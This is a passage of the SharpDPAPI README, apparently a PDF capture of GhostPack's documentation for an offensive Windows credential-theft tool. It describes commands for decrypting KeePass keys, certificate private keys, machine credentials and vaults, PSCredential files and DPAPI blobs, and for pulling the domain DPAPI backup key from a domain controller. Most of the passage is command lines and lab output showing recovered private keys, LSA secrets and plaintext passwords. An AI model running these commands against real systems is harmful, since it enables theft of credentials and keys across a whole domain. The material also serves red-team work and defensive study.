flag will use CryptUnprotectData() to decrypt the key bytes, if the command is run from the\r\nuser context who saved the passwords. This can be done from an unprivileged context, without the need to touch\r\nLSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific ProtectedUserKey.bin file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or\r\n/target:C:\\Folder\\ . If a file is specified, {GUID}:SHA1 values (or /unprotect ) are required, and if a folder\r\nis specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and\r\na /pvk domain backup key must be supplied.\r\nDecrypted key file bytes can be used with the modified KeePass version in KeeThief.\r\nUsing /unprotect to decrypt any found key material:\r\nC:\\Temp\u003e SharpDPAPI.exe keepass /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: KeePass Triage\r\n[*] Using CryptUnprotectData() for decryption.\r\n[*] Triaging KeePass ProtectedUserKey.bin files for current user\r\n File : C:\\Users\\harmj0y\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\r\n Accessed : 3/1/2021 1:38:22 PM\r\n Modified : 1/4/2021 5:49:49 PM\r\n guidMasterKey : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n size : 210\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Key Bytes : 39 2E 63 EF 0E 37 E8 5C 34 ...\r\nSharpDPAPI completed in 00:00:00.0566660\r\ncertificates\r\nThe certificates command will search user encrypted DPAPI certificate private keys a) decrypt them with any \"\r\n{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c)\r\nuse a supplied DPAPI domain backup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 17 of 35\n\nmasterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a\r\nlookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt private keys, if the command is run from the user\r\ncontext whose certificates you are trying to access. This can be done from an unprivileged context, without the\r\nneed to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific certificate can be specified with /target:FILE or /target:C:\\Folder\\ . In both cases,\r\n{GUID}:SHA1 values (or /unprotect ) are required or b) the folder must contain DPAPI masterkeys and a /pvk\r\ndomain backup key must be supplied.\r\nBy default, only private keys linkable to an associated installed certificate are displayed. The /showall\r\ncommand will display ALL decrypted private keys.\r\nUse the /cng flag for CNG private keys (default is capi).\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003e SharpDPAPI.exe certificates {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\n Salt : ef98458bca7135fe1bb89b3715180ae6\r\n HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85\r\n Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da\r\n Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=harmj0y\r\n Valid Date : 2/22/2021 2:19:02 PM\r\n Expiry Date : 2/22/2022 2:19:02 PM\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 18 of 35\n\nEnhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!] Certificate is used for client auth!\r\n Secure Email (1.3.6.1.5.5.7.3.4)\r\n Encrypting File System (1.3.6.1.4.1.311.10.3.4)\r\n [*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...\r\n-----END CERTIFICATE-----\r\nUsing /unprotect to decrypt any found user certificates:\r\nC:\\Temp\u003e SharpDPAPI.exe certificates /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.11.3\r\n[*] Action: Certificate Triage\r\n[*] Using CryptUnprotectData() for decryption.\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {27db0044-e2aa-4ea2-b2c0-c469e9b29ed9}\r\n Description : Private Key\r\n algCrypt : CALG_AES_256 (keyLen 256)\r\n algHash : CALG_SHA_512 (32782)\r\n Salt : d7e1e00ed8a6249b5f05c487154e83cc0b51f71131530d0d46d3bfc63d890468\r\n HMAC : 4869f296cdcc964262a57e2efc4f2c5df57c2ed7319e297daa2107810da5c171\r\n Unique Name : {4A07001C-57BE-4E8B-86D1-43CACDF8D448}\r\n Thumbprint : BBD9B90FE1A4E37BD646CBC922ABE06C24C1E725\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 19 of 35\n\nSubject : CN=harmj0y\r\n Valid Date : 10/18/2022 11:40:07 AM\r\n Expiry Date : 10/18/2023 12:00:07 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!] Certificate is used for client auth!\r\n Server Authentication (1.3.6.1.5.5.7.3.1)\r\n [*] Private key file f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAxVEW49fMt...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIDKjCCAhKgAwIBAgIQYwhUr...(snip)...\r\n-----END CERTIFICATE-----\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe certificates /pvk:HvG1sAAAAAABAAAAAAAAAAAAAACU...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB51371...(snip)...\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 20 of 35\n\nSalt : ef98458bca7135fe1bb89b3715180ae6\r\n HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85\r\n Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da\r\n Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=harmj0y\r\n Valid Date : 2/22/2021 2:19:02 PM\r\n Expiry Date : 2/22/2022 2:19:02 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!] Certificate is used for client auth!\r\n Secure Email (1.3.6.1.5.5.7.3.4)\r\n Encrypting File System (1.3.6.1.4.1.311.10.3.4)\r\n [*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...\r\n-----END CERTIFICATE-----\r\ntriage\r\nThe triage command runs the user credentials, vaults, rdg, and certificates commands.\r\nMachine Triage\r\nmachinemasterkeys\r\nThe machinemasterkeys command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which\r\nis then used to decrypt any found machine DPAPI masterkeys. It will return a set of masterkey {GUID}:SHA1\r\nmappings.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinemasterkeys\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 21 of 35\n\n[*] Action: Machine DPAPI Masterkey File Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\nmachinecredentials\r\nThe machinecredentials command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which\r\nis then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found\r\nmachine Credential files.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinecredentials\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Machine DPAPI Credential Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 22 of 35\n\n[*] Triaging System Credentials\r\nFolder : C:\\WINDOWS\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\r\n CredFile : C73A55F92FAE222C18A8989FEA28A1FE\r\n guidMasterKey : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}\r\n size : 544\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32782/26128\r\n description : Local Credential Data\r\n LastWritten : 3/24/2019 7:08:43 PM\r\n TargetName : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}\r\n TargetAlias :\r\n Comment :\r\n UserName : TESTLAB\\harmj0y\r\n Credential : Password123!\r\nFolder : C:\\WINDOWS\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\r\n CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D\r\n ...(snip)...\r\nmachinevaults\r\nThe machinevaults command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is\r\nthen used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found\r\nmachine Vaults.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinevaults\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 23 of 35\n\n[*] Action: Machine DPAPI Vault Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\n[*] Triaging SYSTEM Vaults\r\n[*] Triaging Vault folder: C:\\WINDOWS\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {0bd732d9-c396-4f9a-a69a-508632c05235}\r\n size : 324\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32782/26128\r\n description :\r\n aes128 key : 74CE3D7BCC4D0C4734931041F6D00D09\r\n aes256 key : B497F57730A2F29C3533B76BD6B33EEA231C1F51ED933E0CA1210B9E3A16D081\r\n...(snip)...\r\ncertificates /machine\r\nThe certificates /machine command will use the machine certificate store to look for decryptable machine\r\ncertificate private keys. /mkfile:X and {GUID}:masterkey are usable with the /target:\\[file|folder\\]\r\ncommand, otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is\r\nthen used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found\r\nmachine system encrypted DPAPI private certificate keys.\r\nBy default, only private keys linkable to an associated installed certificate are displayed. The /showall\r\ncommand will display ALL decrypted private keys.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 24 of 35\n\nC:\\Temp\u003eSharpDPAPI.exe certificates /machine\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...\r\n[*] Triaging System Certificates\r\nFolder : C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\r\n File : 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {f12f57e1-dd41-4daa-88f1-37a64034c7e9}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\n Salt : aa8c9e4849455660fc5fc96589f3e40e\r\n HMAC : 9138559ef30fbd70808dca2c1ed02a29\r\n Unique Name : te-Machine-50500b00-fddb-4a0d-8aa6-d73404473650\r\n Thumbprint : A82ED8207DF6BC16BB65BF6A91E582263E217A4A\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=dev.theshire.local\r\n Valid Date : 2/22/2021 3:50:43 PM\r\n Expiry Date : 2/22/2022 3:50:43 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 25 of 35\n\n[!] Certificate is used for client auth!\r\n Server Authentication (1.3.6.1.5.5.7.3.1)\r\n [*] Private key file 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEAzRX2ipgM1t9Et4KoP...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFOjCCBCKgAwIBAgITVQAAAJqDK8j15...(snip)...\r\n-----END CERTIFICATE-----\r\nmachinetriage\r\nThe machinetriage command runs the user machinecredentials, machinevaults, and certificates /machine\r\ncommands.\r\nMisc\r\nps\r\nThe ps command will describe/decrypt an exported PSCredential clixml. A /target:FILE.xml must be supplied.\r\nThe command will a) decrypt the file with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one\r\nor more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt the credenial .xml without masterkeys needed, if\r\nthe command is run from the user context who saved the passwords. This can be done from an unprivileged\r\ncontext, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's\r\ndocumentation here.\r\nDecrypt an exported credential .xml using CryptProtectData() (the /unprotect flag):\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 26 of 35\n\n[*] Action: Describe PSCredential .xml\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 11:53:09 AM\r\n Modified : 7/25/2019 11:53:09 AM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml \"{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe PSCredential .xml\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 12:04:12 PM\r\n Modified : 7/25/2019 12:04:12 PM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 27 of 35\n\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe PSCredential .xml\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 12:04:12 PM\r\n Modified : 7/25/2019 12:04:12 PM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nblob\r\nThe blob command will describe/decrypt a DPAPI blob. A /target:\u003cBASE64|blob.bin\u003e must be supplied.\r\nThe command will a) decrypt the blob with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one\r\nor more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt the blob without masterkeys needed, if the\r\ncommand is run from the user context who saved the passwords. This can be done from an unprivileged context,\r\nwithout the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's\r\ndocumentation here.\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 28 of 35\n\nDecrypt a blob using CryptProtectData() (the /unprotect flag):\r\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob.bin /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using CryptUnprotectData() for decryption.\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob2.bin {0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using CryptUnprotectData() for decryption.\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 314\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 29 of 35\n\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob2.bin /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 314\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...\r\nbackupkey\r\nThe backupkey command will retrieve the domain DPAPI backup key from a domain controller using the\r\nLsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key\r\nblobs for any user on the domain. And even better, the key never changes ;)\r\nDomain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.\r\nThe /nowrap flag will prevent wrapping the base64 key on display.\r\nThis base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey\r\n/in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys,\r\ncredentials, or vault SharpDPAPI commands.\r\nBy default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A\r\nserver can be specified with /server:COMPUTER.domain.com . If you want the key saved to disk instead of output\r\nas a base64 blob, use /file:key.pvk .\r\nRetrieve the DPAPI backup key for the current domain controller:\r\nC:\\Temp\u003eSharpDPAPI.exe backupkey\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 30 of 35\n\n__ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Retrieve domain DPAPI backup key\r\n[*] Using current domain controller : PRIMARY.testlab.local\r\n[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Key :\r\n HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA...(snip)...\r\nRetrieve the DPAPI backup key for the specified DC, outputting the backup key to a file:\r\nC:\\Temp\u003eSharpDPAPI.exe backupkey /server:primary.testlab.local /file:key.pvk\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Retrieve domain DPAPI backup key\r\n[*] Using server : primary.testlab.local\r\n[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Backup key written to : key.pvk\r\nsearch\r\nThe search command will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs. Usage:\r\nSharpDPAPI.exe search /type:registry [/path:HKLM\\path\\to\\key] [/showErrors]\r\nSharpDPAPI.exe search /type:folder /path:C:\\path\\to\\folder [/maxBytes:\u003cnumOfBytes\u003e] [/showErrors]\r\nSharpDPAPI.exe search /type:file /path:C:\\path\\to\\file [/maxBytes:\u003cnumOfBytes\u003e]\r\nSharpDPAPI.exe search /type:base64 [/base:\u003cbase64 string\u003e]\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 31 of 35\n\nThe search command works by searching for the following bytes, which represent the header (Version + DPAPI\r\nprovider GUID) of DPAPI blob 